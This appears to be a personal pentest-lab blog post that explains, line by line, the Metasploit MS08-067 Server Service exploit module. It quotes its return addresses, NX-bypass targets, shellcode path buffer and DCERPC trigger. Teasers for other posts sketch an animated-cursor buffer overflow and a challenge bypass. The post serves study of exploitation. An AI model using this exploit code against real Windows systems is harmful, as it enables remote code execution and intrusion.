Skip to main content

Pentest LAb 0x02

module ms08_067_netapi
This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. Use google to find more public information or metasploit focused papers. Reading exploit module On backtrack5, the metasploit is deployed into /opt/framework3/msf3. You can read exploit module on or localy in /opt/framework3/msf3/modules/exploits/windows/smb/ms08_067_netapi.rb. Main class I don’t know right Ruby terms, but what is important, try to get experience by reading eventhough you don’t know exact language syntax. When you are familiar with python or PHP it will be easy then you think.

Exploit integration starts with “Ruby class – “Metasploit3″ which is it derived from parrent class Msf::Exploit::Remote and includes some code from module Msf::Exploit::Remote, Msf::Exploit::Remote::SMB.

class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::SMB

I have found definition of modules in /opt/framework3/msf3/lib/msf/core/exploit. After exploring scripts dcerpc.rb and smb.rb, they provides utility methods for interacting with a DCERPC/SMB services. There is class a constructor which sets all optional parameters we know from msfconsole (exploit description and parameters). Interesting detail is attribute target which is an array of:

'Targets' => [

# Antoine's universal for Windows 2000

[ 'Windows 2000 Universal',
{ 'Ret' => 0x001f1cb0,
   'Scratch' => 0x00020408,

# Metasploit's NX bypass for XP SP2/SP3

[ 'Windows XP SP2 Czech (NX)',
 'Ret' => 0x6fe1f727,
 'DisableNX' => 0x6fe216e2,
 'Scratch' => 0x00020408


Exploit method
Exploit method starts SMB session with remote victim.

def exploit


# Use a copy of the target

 mytarget = target


# Windows 2000, XP (NX), and 2003 (NO NX) mytargets

 if(not mytarget['RetDec'])

 jumper = Rex::Text.rand_text_alpha(70).upcase
 jumper[ 4,4] = [mytarget.ret].pack("V")
 jumper[50,8] = make_nops(8)
 jumper[58,2] = "\xeb\x62"

Jumper variable
Rex::Text is metasploit module for formating text. Method Rex::Text.rand_text_alpha(70).upcase will generate random alpha character data and convert them into uppercase. So jumper variable is random char array 70bytes long. After that some substitution follows on specific positions in jumper array.
We inject into array 4byte return address from the 4th byte. Method .pack("V") just considers string value as an 32bit integer number which is useful where we wants to operate with addresses. From 50th byte we put 8xNOP instructions. Hard to say what final bytes do “\xeb\x62″, but ok, let’s try go ahead.

Path String construction

Now reading composition of Path string will be more easy according methods we already know. We construct path string by unicode strings, random 100Byte alpha array, after that is our chosen payload which is encoded, another unicode traversal backslashes and extra padding (pad=’A').

path =
                        Rex::Text.to_unicode("\\") +

# This buffer is removed from the front
Rex::Text.rand_text_alpha(100) +

# Shellcode
payload.encoded +

# Relative path to trigger the bug

Rex::Text.to_unicode("\\..\\..\\") +

# Extra padding

Rex::Text.to_unicode(pad) +

# Writable memory location

(static) [mytarget['Scratch']].pack("V") + # EBP

# Return to code which disables NX (or just the return)

[ mytarget['DisableNX'] || mytarget.ret ].pack("V") +

# Padding with embedded jump
jumper +

# NULL termination

"\x00" * 2

And now we add memory addresses into path string. One is “Scratch” (writable memory location) and jump to code which disable NX protection and goes to our jumper code. Finally we terminate string by zero char which stops action over strings (when is interpreted inside C lang functions).

Send Path string into RPC call

handle = dcerpc_handle(
'4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
stub = NDR.uwstring(server) +
NDR.UnicodeConformantVaryingStringPreBuilt(path) +
NDR.long(rand(1024)) + NDR.wstring(prefix) +
NDR.long(4097) +

# NOTE: we don't bother waiting for a response here...

print_status("Attempting to trigger the vulnerability..."), stub, false)

# Cleanup



Popular posts from this blog

Animated Cursor Vulnerability

Step1: create two file on attacker side 1) default index.html and 2) cursor file to load

Now save the proof of concept in a txt file(cursor.txt). use above command to cut down the hex part from proof of concept and paste it in buffer.ani
Step2:upload the above two files in your apache webserver. 
Step3: Try to open index.html from window-xp and analyse the behavior of IE using ollydgb in order to find the offset address where EIP will get over written. Attach IE in ollydgb and put malicious url in it.

As we can see now that EIP is overwritten with 42424242 that means this place is our offset.
Now we will put the address of jump instruction in place of 42424242 which we will get from user32.dll by searching for command JUMP DWORD [EBX],now we jumped at ebx because it contain the malicious .ani file address.

Just go into view=>executable=>user32.dll , press enter.

Now try to find a jump [ebx] instruction in user32.dll by pressing ctrl+f.Now note down the address of this instruction.…

Hacking Windows 10 UWP App: DLL Injection & common Vulnerabilities

I recently started working on  widows 10 Apps( Apps not Applications) security. Before diving deep in hacking terms lets try to understand what's new in Windows 10 UWP( Universal Platform) as compared to old Apps. Lets begin with how apps actually work on windows 10(desktop/tablet). Now windows 10 comes with a container only for running apps inside the isolated environment. By default, /APPCONTAINER(Linker Flag) is off. This option modifies an executable to indicate whether the app must be run in the appcontainer process-isolation environment. Specify /APPCONTAINER for an app that must run in the appcontainer environment—for example, a Windows Store app. (The option is set automatically in Visual Studio when you create a Windows Store app from a template.) For a desktop app, specify /APPCONTAINER:NO or just omit the option. The /APPCONTAINER option was introduced in Windows 8.
Now there is no registry entry concept for these app in the System HIVE rather they install they own hiv…

Assignment 01(Enroll TO Offensive-Security Course)

Steps 1:download the page.
2:open fc4.js in your favourite editor and add following lines in it or just replace it with vode given below.
3:then open the download html file in browser and fill the form with your email and a garbage value string.
4:thats it? it will show you the real security string??
yeah but  ...theirs another challenge waiting for you ... :D

function fc4me(srvstr) {

   if(! || !document.pleazfc4me.securitystring.value) {
      alert("Please fill in all the required fields!");
      return false;
   else {
   var t=hexMD5("\x74\x72\x79\x68\x61\x72\x64\x65\x72"+srvstr)

Finally Got In :-)